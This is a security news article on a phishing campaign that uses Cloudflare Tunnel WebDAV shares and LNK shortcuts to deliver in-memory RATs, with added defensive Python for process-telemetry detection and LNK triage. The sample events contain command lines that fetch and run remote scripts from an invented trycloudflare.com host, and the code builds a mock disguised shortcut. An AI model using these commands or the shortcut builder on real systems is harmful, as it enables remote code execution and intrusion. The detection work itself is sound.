Malware campaign hides RATs behind Cloudflare tunnels and phishing chains
Farah Amod
Jun 28, 2025 10:09:08 AM

Researchers have uncovered a sophisticated phishing campaign using Cloudflare Tunnel links to deliver in-memory malware payloads across multiple regions.
What happened
A newly discovered campaign dubbed SERPENTINE#CLOUD is using Cloudflare Tunnel infrastructure to host malicious payloads and deliver them through phishing emails. The emails, often disguised as payment or invoice-related messages, link to zipped Windows shortcut files (LNKs) that trigger a multi-step infection process when opened. This attack chain ultimately results in remote access trojans (RATs) being deployed in memory, making detection significantly harder.
According to an article published by SecurityWeek, the campaign targets victims across the U.S., U.K., Germany, and parts of Europe and Asia. The identity of the threat actor remains unknown, though researchers noted that the actor appears to be fluent in English.
Going deeper
The infection begins when a user opens a disguised shortcut file (LNK), which connects to a WebDAV share hosted through Cloudflare Tunnel. From there, it downloads a Windows Script File (WSF) that executes silently in the background using cscript.exe. That script then retrieves a batch file named kiki.bat, which handles the malware installation process.
The batch file runs several actions: it opens a decoy document to distract the user, scans the system for antivirus tools, and then runs a Python-based loader that injects shellcode directly into memory. The final payload is a Donut-packed remote access tool such as AsyncRAT or Revenge RAT, which gives the attacker control over the infected machine while the RAT itself never touches disk.
Traditional security tools often miss these attacks because the final payload exists only in memory, leaving file-scanning, signature-based products nothing to inspect. Cloudflare's trusted domain (*.trycloudflare.com) and tunneling service also help attackers hide their activity: the hosting looks like legitimate cloud traffic, and the tunnel can be torn down and recreated under a new hostname at will. By using temporary infrastructure and avoiding direct exposure of their own servers, attackers gain stealth and flexibility while bypassing common detection methods.
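The chain above is still visible in process-creation telemetry even though the RAT never touches disk. The script below is an added example (not code from the page, Securonix, SecurityWeek or any other party named here) that runs two behavioral rules over a handful of constructed Sysmon-style process events: a script host (cscript.exe or wscript.exe) whose command line points at a WebDAV UNC path or a *.trycloudflare.com host, and a Python interpreter whose process ancestry contains a script host. The PIDs, paths and the trycloudflare.com hostname in the sample events are invented for the demonstration; kiki.bat is the batch file name reported for the campaign.

```python
import re
from dataclasses import dataclass
from typing import Iterable, Iterator

SCRIPT_HOSTS = {"cscript.exe", "wscript.exe"}
PYTHON_IMAGES = {"python.exe", "pythonw.exe"}
# Windows WebDAV mini-redirector UNC paths: \\host@SSL\DavWWWRoot\... or \\host@SSL@443\DavWWWRoot\...
WEBDAV_UNC = re.compile(r"\\\\[^\\\s@]+@(?:SSL|\d+)(?:@\d+)?\\DavWWWRoot", re.I)
# Quick-tunnel hostnames are random labels directly under trycloudflare.com
TRYCLOUDFLARE = re.compile(r"\b[a-z0-9-]+\.trycloudflare\.com\b", re.I)


@dataclass(frozen=True)
class ProcessEvent:
    """One process-creation record (Sysmon event ID 1 or an EDR equivalent)."""
    pid: int
    ppid: int
    image: str
    cmdline: str


def image_name(ev: ProcessEvent) -> str:
    return ev.image.rsplit("\\", 1)[-1].lower()


def ancestry(ev: ProcessEvent, by_pid: dict) -> Iterator[ProcessEvent]:
    """Yield parent, grandparent, ... until the chain leaves the event set (or loops)."""
    seen = {ev.pid}
    cur = by_pid.get(ev.ppid)
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        yield cur
        cur = by_pid.get(cur.ppid)


def detect(events: Iterable[ProcessEvent]) -> list:
    """Return (pid, rule, severity) tuples for events that match the delivery chain."""
    events = list(events)
    by_pid = {e.pid: e for e in events}  # assumes PIDs are unique within the batch
    findings = []
    for ev in events:
        name = image_name(ev)
        # Rule 1: a script host executing content straight off a WebDAV share / quick tunnel.
        if name in SCRIPT_HOSTS and (WEBDAV_UNC.search(ev.cmdline) or TRYCLOUDFLARE.search(ev.cmdline)):
            parent = by_pid.get(ev.ppid)
            # Launched by the shell means a user double-clicked something, i.e. the LNK.
            severity = "high" if parent and image_name(parent) == "explorer.exe" else "medium"
            findings.append((ev.pid, "script_host_remote_webdav", severity))
        # Rule 2: a Python interpreter anywhere below a script host (the in-memory loader stage).
        if name in PYTHON_IMAGES and any(image_name(a) in SCRIPT_HOSTS for a in ancestry(ev, by_pid)):
            findings.append((ev.pid, "python_under_script_host", "high"))
    return findings


# Constructed sample telemetry: the hostname, PIDs and local paths are invented.
SAMPLE_EVENTS = [
    ProcessEvent(1000, 800, r"C:\Windows\explorer.exe", "explorer.exe"),
    # The LNK from the phishing ZIP runs a WSF directly from the tunnel-hosted WebDAV share.
    ProcessEvent(4212, 1000, r"C:\Windows\System32\cscript.exe",
                 r"cscript.exe //nologo \\words-words-words.trycloudflare.com@SSL\DavWWWRoot\sh\invoice.wsf"),
    ProcessEvent(4260, 4212, r"C:\Windows\System32\cmd.exe",
                 r"cmd.exe /c \\words-words-words.trycloudflare.com@SSL\DavWWWRoot\sh\kiki.bat"),
    ProcessEvent(4310, 4260, r"C:\Users\Public\py\pythonw.exe", r"pythonw.exe loader.py"),
    # Benign: a local logon script run from the shell, no remote path involved.
    ProcessEvent(5100, 1000, r"C:\Windows\System32\wscript.exe", r"wscript.exe C:\Scripts\mapdrives.vbs"),
]

if __name__ == "__main__":
    for pid, rule, severity in detect(SAMPLE_EVENTS):
        print(f"pid={pid} rule={rule} severity={severity}")
```

The benign wscript.exe event is included deliberately: script hosts are noisy in most enterprises, so the rule keys on the remote path and on the parent, not on the host alone. Rule 2 walks ancestry rather than checking the immediate parent because the page's chain puts cmd.exe between the script host and the Python loader.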
What was said
The SecurityWeek article notes that the campaign shares traits with earlier attacks observed by eSentire and Proofpoint, but introduces more advanced payloads and deeper obfuscation. These changes may suggest existing actors are refining their methods, though researchers acknowledge the possibility that unrelated groups are adopting similar techniques.
Security researcher Tim Peck said, “The abuse of Cloudflare Tunnel infrastructure further complicates network visibility by giving the actor a disposable and encrypted transport layer for staging malicious files without maintaining traditional infrastructure.”
The big picture
The SERPENTINE#CLOUD campaign reflects a shift in phishing-based malware delivery, combining social engineering, cloud tunneling, memory injection, and living-off-the-land techniques to evade detection. These methods reduce dependence on traditional infrastructure and make attacks harder to trace. Abuse of trusted cloud subdomains presents a growing challenge for defenders using domain-based filtering. As similar campaigns adopt more modular and stealthy approaches, security teams are being pushed to adopt behavior-based detection and enforce stricter controls on third-party service use.
FAQs
What is Cloudflare Tunnel, and why is it being misused?
Cloudflare Tunnel lets developers expose a local server to the internet through an outbound, encrypted connection to Cloudflare's edge, with no inbound firewall rule or public IP required. Its quick-tunnel mode hands out a random hostname under trycloudflare.com without an account. Attackers misuse this to host malicious content on temporary, legitimate-looking subdomains without registering domains or renting servers of their own.
How can users spot malicious LNK files in phishing emails?
These shortcut files masquerade as documents or PDFs, and Windows Explorer hides the .lnk extension even when file extensions are set to display, so a file named invoice.pdf.lnk appears simply as invoice.pdf. Warning signs include the small arrow overlay on the icon, a Type column reading "Shortcut" rather than "PDF Document", a Target field in the file's Properties that points at cmd.exe, cscript.exe, wscript.exe or powershell.exe instead of a document, and delivery inside a ZIP attachment (sometimes password-protected) from a sender claiming an invoice or payment issue.
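Because Explorer hides the .lnk extension, the dependable check is the file's contents rather than its name. The following is an added example (not code from the page or from any of the researchers it cites) that serializes a minimal Shell Link file following the public MS-SHLLINK layout, parses it back, and applies a few triage rules: the target is a command or script host, the arguments reference a WebDAV share or trycloudflare.com, a document-viewer icon sits on an executable target, and the window is minimized on launch. Both sample shortcuts, including the trycloudflare.com hostname and the icon path, are constructed here and are not artifacts from the campaign.

```python
import struct
import uuid

# On-disk CLSID of a Shell Link, little-endian as Windows stores it.
LNK_CLSID = uuid.UUID("00021401-0000-0000-C000-000000000046").bytes_le
HEADER_SIZE = 0x4C
# LinkFlags bits (MS-SHLLINK 2.1.1); the StringData blocks appear in this order.
HAS_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
STRING_FIELDS = [(0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                 (0x20, "arguments"), (0x40, "icon_location")]
SW_SHOWMINNOACTIVE = 7  # ShowCommand value that keeps the launched window out of sight


def build_lnk(fields: dict, show_command: int = SW_SHOWMINNOACTIVE) -> bytes:
    """Serialize a minimal Unicode .lnk: header plus StringData, no IDList or LinkInfo."""
    flags, body = IS_UNICODE, b""
    for bit, key in STRING_FIELDS:
        if key in fields:
            flags |= bit
            # CountCharacters (not bytes), then UTF-16LE text with no terminator.
            body += struct.pack("<H", len(fields[key])) + fields[key].encode("utf-16-le")
    header = struct.pack("<I", HEADER_SIZE) + LNK_CLSID + struct.pack(
        "<IIQQQIIIHHII",  # LinkFlags, FileAttributes, 3 timestamps, FileSize, IconIndex,
        flags, 0, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)  # ShowCommand, HotKey, 3 reserved
    return header + body


def parse_lnk(data: bytes) -> dict:
    """Parse the header and StringData of a .lnk; skips IDList and LinkInfo if present."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data)[0] != HEADER_SIZE \
            or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link (.lnk) file")
    flags = struct.unpack_from("<I", data, 20)[0]
    info = {"flags": flags, "show_command": struct.unpack_from("<I", data, 60)[0]}
    off = HEADER_SIZE
    if flags & HAS_ID_LIST:       # IDListSize (2 bytes) followed by the item ID list
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:     # LinkInfoSize includes the size field itself
        off += struct.unpack_from("<I", data, off)[0]
    unicode = bool(flags & IS_UNICODE)
    for bit, key in STRING_FIELDS:
        if flags & bit:
            count = struct.unpack_from("<H", data, off)[0]
            off += 2
            nbytes = count * 2 if unicode else count
            info[key] = data[off:off + nbytes].decode("utf-16-le" if unicode else "cp1252")
            off += nbytes
    return info


HOSTS = ("cmd.exe", "cscript.exe", "wscript.exe", "powershell.exe", "mshta.exe")
VIEWER_ICONS = ("acrobat", "acrord32", "winword", "excel", ".pdf", ".doc")


def triage(info: dict) -> tuple:
    """Return ("suspicious" | "clean", reasons) from parsed shortcut fields."""
    target = info.get("relative_path", "").lower()
    args = info.get("arguments", "").lower()
    icon = info.get("icon_location", "").lower()
    reasons = []
    if target.endswith(HOSTS):
        reasons.append("target is a command/script host")
    if "davwwwroot" in args or "trycloudflare.com" in args:
        reasons.append("arguments reference a WebDAV share or trycloudflare.com")
    # The next two are supporting signals only; on their own they are common in benign shortcuts.
    if reasons and any(s in icon for s in VIEWER_ICONS):
        reasons.append("document-viewer icon disguising a script launch")
    if reasons and info["show_command"] == SW_SHOWMINNOACTIVE:
        reasons.append("window minimized on launch (SW_SHOWMINNOACTIVE)")
    return ("suspicious" if reasons else "clean", reasons)


# Constructed samples: hostname, paths and icon location are invented for the demonstration.
SAMPLE_MALICIOUS = build_lnk({
    "relative_path": r"..\..\..\Windows\System32\cscript.exe",
    "working_dir": r"C:\Windows\System32",
    "arguments": r"//nologo \\words-words-words.trycloudflare.com@SSL\DavWWWRoot\sh\invoice.wsf",
    "icon_location": r"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe",
})
SAMPLE_BENIGN = build_lnk({"relative_path": r".\report.pdf", "icon_location": r".\report.pdf"},
                          show_command=1)

if __name__ == "__main__":
    for label, blob in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        verdict, why = triage(parse_lnk(blob))
        print(label, verdict, why)
```

Real-world shortcuts usually carry a LinkTargetIDList and LinkInfo block, which the parser skips by size rather than decoding; when the relative path is absent, the true target lives in the IDList and a fuller parser would walk it. The rules still catch the campaign's shape because the WebDAV path and script host show up in the arguments string.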
What is in-memory malware, and why is it hard to detect?
In-memory malware runs directly from RAM without writing files to disk. This minimizes traces and often evades antivirus programs that focus on file-based detection.
Are cloud-based domains like trycloudflare.com typically blocked by security tools?
Not usually. These domains are widely trusted and used for legitimate purposes, making them difficult to blacklist without risking false positives or service disruptions.
What steps can organizations take to defend against campaigns like SERPENTINE#CLOUD?
Organizations should alert on behavior rather than file hashes: a script host (cscript.exe, wscript.exe) launched from Explorer with a UNC or WebDAV path on its command line, a Python interpreter spawned beneath a script host, or outbound WebDAV traffic to hosts the business has no relationship with. Block LNK, WSF and nested-archive attachments at the mail gateway where possible, disable the WebClient (WebDAV) service on endpoints that do not need it, treat *.trycloudflare.com as untrusted unless there is a documented business need, and keep running phishing awareness training so that invoice-themed lures get reported rather than opened.